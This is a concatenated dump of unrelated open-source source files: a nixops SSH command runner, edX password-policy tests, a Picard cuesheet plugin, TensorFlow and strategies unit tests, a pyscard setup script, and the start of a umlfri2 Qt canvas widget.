                self._ssh_master = SSHMaster(self._get_target(), self._logger,
                                             flags, self._get_passwd())
                break
            except Exception:
                tries = tries - 1
                if tries == 0:
                    raise
                pass
        return weakref.proxy(self._ssh_master)

    def _sanitize_command(self, command, allow_ssh_args):
        """
        Helper method for run_command, which essentially prepares and properly
        escape the command. See run_command() for further description.
        """
        if isinstance(command, basestring):
            if allow_ssh_args:
                return shlex.split(command)
            else:
                # "--" stops ssh's own option parsing.
                return ['--', command]
        # iterable
        elif allow_ssh_args:
            return command
        else:
            # Single-quote each argument for the remote shell, escaping
            # embedded single quotes with the '\'' idiom.
            return ['--', ' '.join(["'{0}'".format(arg.replace("'", r"'\''"))
                                    for arg in command])]

    def run_command(self, command, flags=[], timeout=None, logged=True,
                    allow_ssh_args=False, **kwargs):
        """
        Execute a 'command' on the current target host using SSH, passing
        'flags' as additional arguments to SSH. The command can be either a
        string or an iterable of strings, whereby if it's the latter, it will
        be joined with spaces and properly shell-escaped.

        If 'allow_ssh_args' is set to True, the specified command may contain
        SSH flags.

        All keyword arguments except timeout are passed as-is to
        nixops.util.logged_exec(), though if you set 'logged' to False, the
        keyword arguments are passed as-is to subprocess.call() and the command
        is executed interactively with no logging.

        'timeout' specifies the SSH connection timeout.
        """
        tries = 5
        if timeout is not None:
            flags = flags + ["-o", "ConnectTimeout={0}".format(timeout)]
            # With an explicit timeout we do not want get_master to retry.
            tries = 1
        master = self.get_master(flags, tries)
        flags = flags + self._get_flags()
        if logged:
            # -x: disable X11 forwarding for non-interactive runs.
            flags.append("-x")
        cmd = ["ssh"] + master.opts + flags
        cmd.append(self._get_target())
        cmd += self._sanitize_command(command, allow_ssh_args)
        if logged:
            try:
                return nixops.util.logged_exec(cmd, self._logger, **kwargs)
            except nixops.util.CommandFailed as exc:
                # Translate into the SSH-specific failure type.
                # NOTE: exc.message is Python 2 only.
                raise SSHCommandFailed(exc.message, exc.exitcode)
        else:
            # Interactive path: run without capturing output; 'check' mirrors
            # subprocess-style behaviour and defaults to raising on failure.
            check = kwargs.pop('check', True)
            res = subprocess.call(cmd, **kwargs)
            if check and res != 0:
                msg = "command ‘{0}’ failed on host ‘{1}’"
                err = msg.format(cmd, self._get_target())
                raise SSHCommandFailed(err, res)
            else:
                return res
| lgpl-3.0 |
caesar2164/edx-platform | common/djangoapps/student/tests/test_password_policy.py | 10 | 12721 | # -*- coding: utf-8 -*-
"""
This test file will verify proper password policy enforcement, which is an optional feature
"""
import json
from django.test import TestCase
from django.test.client import RequestFactory
from django.core.urlresolvers import reverse
from django.contrib.auth.models import AnonymousUser
from importlib import import_module
from django.test.utils import override_settings
from django.conf import settings
from mock import patch
from openedx.core.djangoapps.external_auth.models import ExternalAuthMap
from student.views import create_account
@patch.dict("django.conf.settings.FEATURES", {'ENFORCE_PASSWORD_POLICY': True})
class TestPasswordPolicy(TestCase):
    """
    Go through some password policy tests to make sure things are properly working
    """
    def setUp(self):
        super(TestPasswordPolicy, self).setUp()
        self.url = reverse('create_account')
        self.request_factory = RequestFactory()
        self.url_params = {
            'username': 'username',
            'email': 'foo_bar@bar.com',
            'name': 'username',
            'terms_of_service': 'true',
            'honor_code': 'true',
        }

    def assert_password_rejected(self, password, expected_message):
        """
        Attempt a registration using `password` and assert that it is rejected
        (HTTP 400) with `expected_message` reported as the error value.
        """
        self.url_params['password'] = password
        response = self.client.post(self.url, self.url_params)
        self.assertEqual(response.status_code, 400)
        obj = json.loads(response.content)
        self.assertEqual(obj['value'], expected_message)

    def assert_password_accepted(self, password):
        """
        Attempt a registration using `password` and assert that the account is
        created successfully (HTTP 200 with the success flag set).
        """
        self.url_params['password'] = password
        response = self.client.post(self.url, self.url_params)
        self.assertEqual(response.status_code, 200)
        obj = json.loads(response.content)
        self.assertTrue(obj['success'])

    @override_settings(PASSWORD_MIN_LENGTH=6)
    def test_password_length_too_short(self):
        self.assert_password_rejected(
            'aaa',
            "Password: Invalid Length (must be 6 characters or more)",
        )

    @override_settings(PASSWORD_MIN_LENGTH=6)
    def test_password_length_long_enough(self):
        self.assert_password_accepted('ThisIsALongerPassword')

    @override_settings(PASSWORD_MAX_LENGTH=12)
    def test_password_length_too_long(self):
        self.assert_password_rejected(
            'ThisPasswordIsWayTooLong',
            "Password: Invalid Length (must be 12 characters or fewer)",
        )

    @patch.dict("django.conf.settings.PASSWORD_COMPLEXITY", {'UPPER': 3})
    def test_password_not_enough_uppercase(self):
        self.assert_password_rejected(
            'thisshouldfail',
            "Password: Must be more complex (must contain 3 or more uppercase characters)",
        )

    @patch.dict("django.conf.settings.PASSWORD_COMPLEXITY", {'UPPER': 3})
    def test_password_enough_uppercase(self):
        self.assert_password_accepted('ThisShouldPass')

    @patch.dict("django.conf.settings.PASSWORD_COMPLEXITY", {'LOWER': 3})
    def test_password_not_enough_lowercase(self):
        self.assert_password_rejected(
            'THISSHOULDFAIL',
            "Password: Must be more complex (must contain 3 or more lowercase characters)",
        )

    @patch.dict("django.conf.settings.PASSWORD_COMPLEXITY", {'LOWER': 3})
    def test_password_enough_lowercase(self):
        self.assert_password_accepted('ThisShouldPass')

    @patch.dict("django.conf.settings.PASSWORD_COMPLEXITY", {'DIGITS': 3})
    def test_not_enough_digits(self):
        self.assert_password_rejected(
            'thishasnodigits',
            "Password: Must be more complex (must contain 3 or more digits)",
        )

    @patch.dict("django.conf.settings.PASSWORD_COMPLEXITY", {'DIGITS': 3})
    def test_enough_digits(self):
        self.assert_password_accepted('Th1sSh0uldPa88')

    @patch.dict("django.conf.settings.PASSWORD_COMPLEXITY", {'PUNCTUATION': 3})
    def test_not_enough_punctuations(self):
        self.assert_password_rejected(
            'thisshouldfail',
            "Password: Must be more complex (must contain 3 or more punctuation characters)",
        )

    @patch.dict("django.conf.settings.PASSWORD_COMPLEXITY", {'PUNCTUATION': 3})
    def test_enough_punctuations(self):
        self.assert_password_accepted('Th!sSh.uldPa$*')

    @patch.dict("django.conf.settings.PASSWORD_COMPLEXITY", {'WORDS': 3})
    def test_not_enough_words(self):
        self.assert_password_rejected(
            'thisshouldfail',
            "Password: Must be more complex (must contain 3 or more unique words)",
        )

    @patch.dict("django.conf.settings.PASSWORD_COMPLEXITY", {'WORDS': 3})
    def test_enough_words(self):
        # Renamed from "test_enough_wordss" (typo in the original method name).
        self.assert_password_accepted(u'this should pass')

    @patch.dict("django.conf.settings.PASSWORD_COMPLEXITY", {
        'PUNCTUATION': 3,
        'WORDS': 3,
        'DIGITS': 3,
        'LOWER': 3,
        'UPPER': 3,
    })
    def test_multiple_errors_fail(self):
        # All unmet requirements are reported together in one message.
        errstring = (
            "Password: Must be more complex ("
            "must contain 3 or more uppercase characters, "
            "must contain 3 or more digits, "
            "must contain 3 or more punctuation characters, "
            "must contain 3 or more unique words"
            ")"
        )
        self.assert_password_rejected('thisshouldfail', errstring)

    @patch.dict("django.conf.settings.PASSWORD_COMPLEXITY", {
        'PUNCTUATION': 3,
        'WORDS': 3,
        'DIGITS': 3,
        'LOWER': 3,
        'UPPER': 3,
    })
    def test_multiple_errors_pass(self):
        self.assert_password_accepted(u'tH1s Sh0u!d P3#$')

    @override_settings(PASSWORD_DICTIONARY=['foo', 'bar'])
    @override_settings(PASSWORD_DICTIONARY_EDIT_DISTANCE_THRESHOLD=1)
    def test_dictionary_similarity_fail1(self):
        self.assert_password_rejected(
            'foo',
            "Password: Too similar to a restricted dictionary word.",
        )

    @override_settings(PASSWORD_DICTIONARY=['foo', 'bar'])
    @override_settings(PASSWORD_DICTIONARY_EDIT_DISTANCE_THRESHOLD=1)
    def test_dictionary_similarity_fail2(self):
        self.assert_password_rejected(
            'bar',
            "Password: Too similar to a restricted dictionary word.",
        )

    @override_settings(PASSWORD_DICTIONARY=['foo', 'bar'])
    @override_settings(PASSWORD_DICTIONARY_EDIT_DISTANCE_THRESHOLD=1)
    def test_dictionary_similarity_fail3(self):
        # 'fo0' is one edit away from 'foo' — within the threshold of 1.
        self.assert_password_rejected(
            'fo0',
            "Password: Too similar to a restricted dictionary word.",
        )

    @override_settings(PASSWORD_DICTIONARY=['foo', 'bar'])
    @override_settings(PASSWORD_DICTIONARY_EDIT_DISTANCE_THRESHOLD=1)
    def test_dictionary_similarity_pass(self):
        self.assert_password_accepted('this_is_ok')

    def test_with_unicode(self):
        self.assert_password_accepted(u'四節比分和七年前')

    @override_settings(PASSWORD_MIN_LENGTH=6, SESSION_ENGINE='django.contrib.sessions.backends.cache')
    def test_ext_auth_password_length_too_short(self):
        """
        Tests that even if password policy is enforced, ext_auth registrations aren't subject to it
        """
        self.url_params['password'] = 'aaa'  # shouldn't pass validation
        request = self.request_factory.post(self.url, self.url_params)
        # now indicate we are doing ext_auth by setting 'ExternalAuthMap' in the session.
        request.session = import_module(settings.SESSION_ENGINE).SessionStore()  # empty session
        extauth = ExternalAuthMap(external_id='withmap@stanford.edu',
                                  external_email='withmap@stanford.edu',
                                  internal_password=self.url_params['password'],
                                  external_domain='shib:https://idp.stanford.edu/')
        request.session['ExternalAuthMap'] = extauth
        request.user = AnonymousUser()
        with patch('edxmako.request_context.get_current_request', return_value=request):
            response = create_account(request)
        self.assertEqual(response.status_code, 200)
        obj = json.loads(response.content)
        self.assertTrue(obj['success'])
class TestUsernamePasswordNonmatch(TestCase):
    """
    Test that registration username and password fields differ
    """
    def setUp(self):
        super(TestUsernamePasswordNonmatch, self).setUp()
        self.url = reverse('create_account')
        self.url_params = {
            'username': 'username',
            'email': 'foo_bar@bar.com',
            'name': 'username',
            'terms_of_service': 'true',
            'honor_code': 'true',
        }

    def test_with_username_password_match(self):
        """Registration is rejected when username and password are identical."""
        self.url_params['username'] = "foobar"
        self.url_params['password'] = "foobar"
        response = self.client.post(self.url, self.url_params)
        # assertEqual instead of the deprecated assertEquals alias.
        self.assertEqual(response.status_code, 400)
        obj = json.loads(response.content)
        self.assertEqual(
            obj['value'],
            "Username and password fields cannot match",
        )

    def test_with_username_password_nonmatch(self):
        """Registration succeeds when username and password differ."""
        self.url_params['username'] = "foobar"
        self.url_params['password'] = "nonmatch"
        response = self.client.post(self.url, self.url_params)
        self.assertEqual(response.status_code, 200)
        obj = json.loads(response.content)
        self.assertTrue(obj['success'])
| agpl-3.0 |
mwiencek/picard | contrib/plugins/cuesheet.py | 3 | 6597 | # -*- coding: utf-8 -*-
PLUGIN_NAME = u"Generate Cuesheet"
PLUGIN_AUTHOR = u"Lukáš Lalinský"
PLUGIN_DESCRIPTION = "Generate cuesheet (.cue file) from an album."
PLUGIN_VERSION = "0.1"
PLUGIN_API_VERSIONS = ["0.10", "0.15"]
import os.path
import re
from PyQt4 import QtCore, QtGui
from picard.util import find_existing_path, encode_filename
from picard.ui.itemviews import BaseAction, register_album_action
_whitespace_re = re.compile('\s', re.UNICODE)
_split_re = re.compile('\s*("[^"]*"|[^ ]+)\s*', re.UNICODE)
def msfToMs(msf):
    """Convert a cuesheet MM:SS:FF timestamp (75 frames per second) to
    milliseconds."""
    minutes, seconds, frames = (int(part) for part in msf.split(":"))
    total_frames = (minutes * 60 + seconds) * 75 + frames
    return total_frames * 1000 / 75
class CuesheetTrack(list):
    """
    One track section of a cuesheet.

    The instance itself is a list of raw cuesheet commands, each stored as a
    sequence of fields, e.g. (u"TITLE", u"Song") or
    (u"INDEX", u"01", u"00:02:00").  Slot 0 of the owning cuesheet holds the
    album-level commands; real tracks start at index 1.
    """

    def __init__(self, cuesheet, index):
        list.__init__(self)
        self.cuesheet = cuesheet  # owning Cuesheet; used to reach the next track
        self.index = index        # track number; 0 is the album-level slot

    def set(self, *args):
        """Append a raw command, e.g. track.set(u"TITLE", u"Foo")."""
        self.append(args)

    def find(self, prefix):
        """Return all commands whose leading fields equal *prefix* (a tuple)."""
        return [entry for entry in self
                if tuple(entry[:len(prefix)]) == tuple(prefix)]

    def getTrackNumber(self):
        return self.index

    def getLength(self):
        """Track length in milliseconds, computed as the difference between
        this track's INDEX 01 and the next track's; 0 when there is no next
        track (or an INDEX 01 entry is missing)."""
        try:
            nextTrack = self.cuesheet.tracks[self.index + 1]
            index0 = self.find((u"INDEX", u"01"))
            index1 = nextTrack.find((u"INDEX", u"01"))
            return msfToMs(index1[0][2]) - msfToMs(index0[0][2])
        except IndexError:
            return 0

    def getField(self, prefix):
        """First value following *prefix*, or u"" when no such command exists."""
        try:
            return self.find(prefix)[0][len(prefix)]
        except IndexError:
            return u""

    def getArtist(self):
        return self.getField((u"PERFORMER",))

    def getTitle(self):
        return self.getField((u"TITLE",))

    def setArtist(self, artist):
        """Replace the first PERFORMER command with *artist*, dropping any
        duplicate PERFORMER entries; append a new command when none exists.

        BUG FIX: the previous implementation assigned ``item[1] = artist``,
        which raises TypeError for the tuple entries created by set(), and
        used ``del item``, which only unbinds the loop variable and never
        removed duplicates from the list.
        """
        found = False
        kept = []
        for entry in self:
            if entry[0] == u"PERFORMER":
                if found:
                    continue  # drop duplicate PERFORMER entries
                entry = (u"PERFORMER", artist)
                found = True
            kept.append(entry)
        self[:] = kept
        if not found:
            self.append((u"PERFORMER", artist))

    artist = property(getArtist, setArtist)
class Cuesheet(object):
    """
    In-memory representation of a .cue file as a list of CuesheetTrack
    sections (slot 0 = album-level commands).  Python 2 str/bytes semantics:
    read() decodes each line, write() re-encodes to UTF-8.
    """

    def __init__(self, filename):
        self.filename = filename
        self.tracks = []

    def read(self):
        # Read the raw (byte-string) lines and parse them.
        f = open(encode_filename(self.filename))
        self.parse(f.readlines())
        f.close()

    def unquote(self, string):
        # Strip surrounding double quotes; a missing closing quote is
        # tolerated and only the opening quote is removed.
        if string.startswith('"'):
            if string.endswith('"'):
                return string[1:-1]
            else:
                return string[1:]
        return string

    def quote(self, string):
        # Quote values containing whitespace.  Embedded double quotes are
        # replaced by single quotes, since cue syntax has no escape sequence.
        if _whitespace_re.search(string):
            return '"' + string.replace('"', '\'') + '"'
        return string

    def parse(self, lines):
        # Slot 0 collects album-level commands until the first TRACK line.
        track = CuesheetTrack(self, 0)
        self.tracks = [track]
        isUnicode = False
        for line in lines:
            # remove BOM
            # NOTE(review): '\xfe\xff' is the UTF-16 BE BOM, yet the file is
            # then decoded as UTF-8 and only one of the two bytes is
            # stripped — looks suspicious; confirm against real cue files.
            if line.startswith('\xfe\xff'):
                isUnicode = True
                line = line[1:]
            # decode to unicode string
            line = line.strip()
            if isUnicode:
                line = line.decode('UTF-8', 'replace')
            else:
                line = line.decode('ISO-8859-1', 'replace')
            # parse the line
            split = [self.unquote(s) for s in _split_re.findall(line)]
            keyword = split[0].upper()
            if keyword == 'TRACK':
                # Start a new track section numbered from the TRACK command.
                trackNum = int(split[1])
                track = CuesheetTrack(self, trackNum)
                self.tracks.append(track)
            track.append(split)

    def write(self):
        # Serialize all sections back to UTF-8 encoded lines; per-track
        # commands are indented (TRACK by 2, everything but FILE by 4).
        lines = []
        for track in self.tracks:
            num = track.index
            for line in track:
                indent = 0
                if num > 0:
                    if line[0] == "TRACK":
                        indent = 2
                    elif line[0] != "FILE":
                        indent = 4
                line2 = u" ".join([self.quote(s) for s in line])
                lines.append(" " * indent + line2.encode("UTF-8") + "\n")
        f = open(encode_filename(self.filename), "wt")
        f.writelines(lines)
        f.close()
class GenerateCuesheet(BaseAction):
    """Album context-menu action that writes a .cue file for the album."""
    NAME = "Generate &Cuesheet..."

    def callback(self, objs):
        # Invoked with the selected items; only the first (an album) is used.
        album = objs[0]
        current_directory = self.config.persist["current_directory"] or QtCore.QDir.homePath()
        current_directory = find_existing_path(unicode(current_directory))
        selected_format = QtCore.QString()
        filename = QtGui.QFileDialog.getSaveFileName(None, "", current_directory, "Cuesheet (*.cue)", selected_format)
        if filename:
            filename = unicode(filename)
            cuesheet = Cuesheet(filename)
            #try: cuesheet.read()
            #except IOError: pass
            # Ensure one CuesheetTrack per album track, plus the leading
            # album-level slot at index 0.
            while len(cuesheet.tracks) <= len(album.tracks):
                track = CuesheetTrack(cuesheet, len(cuesheet.tracks))
                cuesheet.tracks.append(track)
            #if len(cuesheet.tracks) > len(album.tracks) - 1:
            #    cuesheet.tracks = cuesheet.tracks[0:len(album.tracks)+1]
            # Album-level commands go into slot 0.
            t = cuesheet.tracks[0]
            t.set("PERFORMER", album.metadata["albumartist"])
            t.set("TITLE", album.metadata["album"])
            t.set("REM", "MUSICBRAINZ_ALBUM_ID", album.metadata["musicbrainz_albumid"])
            t.set("REM", "MUSICBRAINZ_ALBUM_ARTIST_ID", album.metadata["musicbrainz_albumartistid"])
            if "date" in album.metadata:
                t.set("REM", "DATE", album.metadata["date"])
            # Running start offset of the current track, in seconds.
            index = 0.0
            for i, track in enumerate(album.tracks):
                # Split the offset into minutes/seconds/frames (75 fps).
                mm = index / 60.0
                ss = (mm - int(mm)) * 60.0
                ff = (ss - int(ss)) * 75.0
                index += track.metadata.length / 1000.0
                t = cuesheet.tracks[i + 1]
                t.set("TRACK", "%02d" % (i + 1), "AUDIO")
                t.set("PERFORMER", track.metadata["artist"])
                t.set("TITLE", track.metadata["title"])
                t.set("REM", "MUSICBRAINZ_TRACK_ID", track.metadata["musicbrainz_trackid"])
                t.set("REM", "MUSICBRAINZ_ARTIST_ID", track.metadata["musicbrainz_artistid"])
                t.set("INDEX", "01", "%02d:%02d:%02d" % (mm, ss, ff))
                for file in track.linked_files:
                    audio_filename = file.filename
                    if os.path.dirname(filename) == os.path.dirname(audio_filename):
                        audio_filename = os.path.basename(audio_filename)
                    # FILE lines precede their TRACK entry in cue syntax, so
                    # the command is attached to the previous slot (index i).
                    cuesheet.tracks[i].set("FILE", audio_filename, "MP3")
            cuesheet.write()
# Instantiate and register the action so it appears in Picard's album
# context menu.
action = GenerateCuesheet()
register_album_action(action)
| gpl-2.0 |
ibab/tensorflow | tensorflow/contrib/tensor_forest/python/kernel_tests/tree_predictions_op_test.py | 8 | 3754 | # Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tf.contrib.tensor_forest.ops.tree_predictions_op."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow # pylint: disable=unused-import
from tensorflow.contrib.tensor_forest.python.ops import inference_ops
from tensorflow.python.framework import test_util
from tensorflow.python.platform import googletest
class TreePredictionsTest(test_util.TensorFlowTestCase):
  """Unit tests for the tree_predictions custom inference op."""

  def setUp(self):
    # Load the native inference ops once per test.
    self.ops = inference_ops.Load()

  def testSimple(self):
    """Each input row receives the class distribution of its leaf."""
    input_data = [[-1., 0.], [-1., 2.],  # node 1
                  [1., 0.], [1., -2.]]  # node 2

    tree = [[1, 0], [-1, 0], [-1, 0]]
    tree_thresholds = [0., 0., 0.]
    node_pcw = [[1.0, 0.3, 0.4, 0.3], [1.0, 0.1, 0.1, 0.8],
                [1.0, 0.5, 0.25, 0.25]]

    with self.test_session():
      predictions = self.ops.tree_predictions(
          input_data, tree, tree_thresholds, node_pcw,
          valid_leaf_threshold=1)

      self.assertAllClose([[0.1, 0.1, 0.8], [0.1, 0.1, 0.8],
                           [0.5, 0.25, 0.25], [0.5, 0.25, 0.25]],
                          predictions.eval())

  def testBackoffToParent(self):
    """Leaves below the valid threshold blend in their parent's counts."""
    input_data = [[-1., 0.], [-1., 2.],  # node 1
                  [1., 0.], [1., -2.]]  # node 2

    tree = [[1, 0], [-1, 0], [-1, 0]]
    tree_thresholds = [0., 0., 0.]
    node_pcw = [[15.0, 3.0, 9.0, 3.0], [5.0, 1.0, 1.0, 3.0],
                [25.0, 5.0, 20.0, 0.0]]

    with self.test_session():
      predictions = self.ops.tree_predictions(
          input_data, tree, tree_thresholds, node_pcw,
          valid_leaf_threshold=10)

      # Node 2 has enough data, but Node 1 needs to combine with the parent
      # counts.
      self.assertAllClose([[0.2, 0.4, 0.4], [0.2, 0.4, 0.4],
                           [0.2, 0.8, 0.0], [0.2, 0.8, 0.0]],
                          predictions.eval())

  def testNoInput(self):
    """An empty batch yields an empty (0, num_classes) prediction tensor."""
    input_data = []

    tree = [[1, 0], [-1, 0], [-1, 0]]
    tree_thresholds = [0., 0., 0.]
    node_pcw = [[1.0, 0.3, 0.4, 0.3], [1.0, 0.1, 0.1, 0.8],
                [1.0, 0.5, 0.25, 0.25]]

    with self.test_session():
      predictions = self.ops.tree_predictions(
          input_data, tree, tree_thresholds, node_pcw,
          valid_leaf_threshold=10)

      # assertEqual instead of the deprecated assertEquals alias.
      self.assertEqual((0, 3), predictions.eval().shape)

  def testBadInput(self):
    """Mismatched node counts across inputs raise an op error."""
    input_data = [[-1., 0.], [-1., 2.],  # node 1
                  [1., 0.], [1., -2.]]  # node 2

    tree = [[1, 0], [-1, 0], [-1, 0]]
    tree_thresholds = [0., 0.]  # not enough nodes.
    node_pcw = [[1.0, 0.3, 0.4, 0.3], [1.0, 0.1, 0.1, 0.8],
                [1.0, 0.5, 0.25, 0.25]]

    with self.test_session():
      with self.assertRaisesOpError(
          'Number of nodes should be the same in tree, tree_thresholds '
          'and node_pcw.'):
        predictions = self.ops.tree_predictions(
            input_data, tree, tree_thresholds, node_pcw,
            valid_leaf_threshold=10)

        self.assertEqual((0, 3), predictions.eval().shape)


if __name__ == '__main__':
  googletest.main()
| apache-2.0 |
logpy/strategies | strategies/tests/test_core.py | 1 | 1841 | from strategies.core import (exhaust, memoize, condition,
chain, do_one, debug, switch, minimize, null_safe)
from functools import partial
def test_null_safe():
    """null_safe returns the input unchanged when the rule yields None."""
    def only_one(expr):
        if expr == 1:
            return 2

    wrapped = null_safe(only_one)
    assert only_one(1) == wrapped(1)
    assert only_one(3) is None
    assert wrapped(3) == 3
def posdec(x):
    """Decrement positive numbers; leave zero and negatives unchanged."""
    return x - 1 if x > 0 else x
def test_exhaust():
    """exhaust applies posdec repeatedly until a fixed point (zero)."""
    drain = exhaust(posdec)
    for start in (5, 10):
        assert drain(start) == 0
def test_memoize():
    """A memoized rule agrees with the bare rule, including on cache hits."""
    cached = memoize(posdec)
    for value in (5, 5, -2):
        assert cached(value) == posdec(value)
def test_condition():
    """condition applies the rule only when the predicate holds."""
    guarded = condition(lambda x: x % 2 == 0, posdec)
    assert guarded(5) == 5
    assert guarded(4) == 3
def test_chain():
    """chain composes rules sequentially (posdec applied twice)."""
    twice = chain([posdec, posdec])
    assert twice(5) == 3
    assert twice(1) == 0
def test_do_one():
    """do_one applies exactly one of the supplied rules."""
    first_only = do_one([posdec, posdec])
    assert first_only(5) == 4
def test_debug():
    """debug logs the rule name plus the before/after values."""
    try:
        from StringIO import StringIO  # Python 2
    except ImportError:
        from io import StringIO  # Python 3

    log_file = StringIO()
    logged = debug(posdec, log_file)
    logged(5)
    contents = log_file.getvalue()
    log_file.close()

    assert posdec.__name__ in contents
    for token in ('5', '4'):
        assert token in contents
def test_switch():
    """switch dispatches on the key function, passing through on a miss."""
    inc = lambda x: x + 1
    dec = lambda x: x - 1
    rule = switch(lambda x: x % 3, {0: inc, 1: dec})
    assert rule(3) == 4   # key 0 -> inc
    assert rule(4) == 3   # key 1 -> dec
    assert rule(5) == 5   # key 2 -> no entry, unchanged
def test_minimize():
    """minimize picks the rule output that minimizes the objective."""
    inc = lambda x: x + 1
    dec = lambda x: x - 1

    smallest = minimize([inc, dec])
    assert smallest(4) == 3

    largest = minimize([inc, dec], objective=lambda x: -x)
    assert largest(4) == 5
def test_do_one():
    # NOTE: this second definition of test_do_one shadows the earlier one
    # above, so that test never ran; its assertion is folded in here so both
    # behaviours stay exercised.
    first_only = do_one([posdec, posdec])
    assert first_only(5) == 4

    rl1 = lambda x: 2 if x == 1 else x
    rl2 = lambda x: 3 if x == 2 else x
    rule = do_one([rl1, rl2])
    assert rule(1) == 2
    assert rule(rule(1)) == 3
| bsd-3-clause |
sekimura/pyscard | smartcard/Examples/wx/readerviewer/setup.py | 2 | 1433 | #! /usr/bin/env python
"""
Setup script to build a standalone readerviewer.exe executable on windows
using py2exe. Run: python.exe setup.py py2exe, to build executable file.
__author__ = "http://www.gemalto.com"
Copyright 2001-2010 gemalto
Author: Jean-Daniel Aussel, mailto:jean-daniel.aussel@gemalto.com
This file is part of pyscard.
pyscard is free software; you can redistribute it and/or modify
it under the terms of the GNU Lesser General Public License as published by
the Free Software Foundation; either version 2.1 of the License, or
(at your option) any later version.
pyscard is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public License
along with pyscard; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
from distutils.core import setup
import py2exe
from smartcard.wx import ICO_SMARTCARD, ICO_READER
# Files bundled next to the generated executable: the viewer's own icon plus
# the shared smartcard/reader icons shipped with pyscard's wx support.
image_files = [
    ('images', ['images/readerviewer.ico', ICO_SMARTCARD, ICO_READER]),
]

setup(
    windows=['readerviewer.py'],
    data_files=image_files,
    # MSVCP90.dll is provided by the VC++ runtime and must not be bundled.
    options={"py2exe": {"dll_excludes": ["MSVCP90.dll"]}},
)
| lgpl-2.1 |
umlfri/umlfri2 | umlfri2/qtgui/canvas/canvaswidget.py | 1 | 12931 | from PyQt5.QtCore import Qt, QSize
from PyQt5.QtGui import QPainter, QContextMenuEvent, QKeySequence
from PyQt5.QtWidgets import QWidget, QApplication, QShortcut
from umlfri2.application import Application
from umlfri2.application.commands.diagram import ShowElementCommand, ChangeZOrderCommand, ZOrderDirection, \
HideElementsCommand, HideConnectionCommand
from umlfri2.application.commands.model import DeleteElementsCommand, DeleteConnectionCommand
from umlfri2.application.drawingarea import DrawingAreaCursor
from umlfri2.application.events.application import ZoomChangedEvent
from umlfri2.application.events.diagram import DiagramChangedEvent, SelectionChangedEvent
from umlfri2.application.events.model import ObjectDataChangedEvent, ConnectionChangedEvent, ElementCreatedEvent, \
ElementDeletedEvent, NodeMovedEvent
from umlfri2.application.events.solution import MetamodelConfigChangedEvent
from umlfri2.constants.keys import DELETE_FROM_PROJECT, Z_ORDER_RAISE, Z_ORDER_LOWER, Z_ORDER_TO_BOTTOM, Z_ORDER_TO_TOP
from umlfri2.metamodel import DefaultElementAction
from umlfri2.model import ElementObject
from umlfri2.model.element import ElementVisual
from umlfri2.types.geometry import Point
from .connectionmenu import CanvasConnectionMenu
from .diagrammenu import CanvasDiagramMenu
from .elementmenu import CanvasElementMenu
from .actionmenu import ActionMenu
from ..projecttree import ProjectMimeData
from ..properties import PropertiesDialog
from ..rendering import QTPainterCanvas
class CanvasWidget(QWidget):
    def __init__(self, main_window, drawing_area):
        """Create a canvas widget showing *drawing_area* inside *main_window*."""
        super().__init__()
        self.__main_window = main_window
        self.__drawing_area = drawing_area
        # Accept keyboard focus by both tabbing and clicking so the local
        # shortcuts below work.
        self.setFocusPolicy(Qt.StrongFocus)
        # Receive move events even with no button pressed (cursor feedback).
        self.setMouseTracking(True)
        # The widget repaints itself completely; skip background erasing.
        self.setAttribute(Qt.WA_OpaquePaintEvent)
        self.__old_cursor = None
        self.setAcceptDrops(True)
        self.__update_size()
        self.__mouse_down = False
        # Repaint whenever anything visible on the diagram may have changed.
        Application().event_dispatcher.subscribe(ObjectDataChangedEvent, self.__something_changed)
        Application().event_dispatcher.subscribe(DiagramChangedEvent, self.__something_changed)
        Application().event_dispatcher.subscribe(SelectionChangedEvent, self.__something_changed)
        Application().event_dispatcher.subscribe(ConnectionChangedEvent, self.__something_changed)
        Application().event_dispatcher.subscribe(ZoomChangedEvent, self.__something_changed)
        Application().event_dispatcher.subscribe(ElementCreatedEvent, self.__something_changed)
        Application().event_dispatcher.subscribe(ElementDeletedEvent, self.__something_changed)
        Application().event_dispatcher.subscribe(NodeMovedEvent, self.__something_changed)
        Application().event_dispatcher.subscribe(MetamodelConfigChangedEvent, self.__something_changed)
        # Canvas-local keyboard shortcuts.
        QShortcut(QKeySequence(QKeySequence.Delete), self).activated.connect(self.__hide_object)
        QShortcut(QKeySequence(DELETE_FROM_PROJECT), self).activated.connect(self.__delete_object)
        QShortcut(QKeySequence(Z_ORDER_LOWER), self).activated.connect(self.__z_order_back)
        QShortcut(QKeySequence(Z_ORDER_RAISE), self).activated.connect(self.__z_order_forward)
        QShortcut(QKeySequence(Z_ORDER_TO_BOTTOM), self).activated.connect(self.__z_order_bottom)
        QShortcut(QKeySequence(Z_ORDER_TO_TOP), self).activated.connect(self.__z_order_top)
        QShortcut(QKeySequence(QKeySequence.Cancel), self).activated.connect(self.__cancel_action)
    @property
    def diagram(self):
        # The diagram currently displayed by the underlying drawing area.
        return self.__drawing_area.diagram
    def paintEvent(self, event):
        """Repaint the whole widget by delegating to the drawing area."""
        painter = QPainter()
        painter.begin(self)
        painter.setRenderHint(QPainter.Antialiasing)
        # Wrap the Qt painter in the project's canvas abstraction so the
        # drawing area stays toolkit-independent.
        canvas = QTPainterCanvas(painter)
        self.__drawing_area.draw(canvas)
        painter.end()
    def mousePressEvent(self, event):
        """Begin a drawing-area interaction on left press; defer otherwise."""
        pos = event.pos()
        point = Point(pos.x(), pos.y())
        if event.button() == Qt.LeftButton:
            # Ctrl/Shift modifiers are forwarded as interaction flags.
            self.__drawing_area.mouse_down(
                point,
                QApplication.keyboardModifiers() == Qt.ControlModifier,
                QApplication.keyboardModifiers() == Qt.ShiftModifier
            )
            self.__mouse_down = True
            self.__do_update()
        else:
            # A non-left press during an active left-drag first finishes that
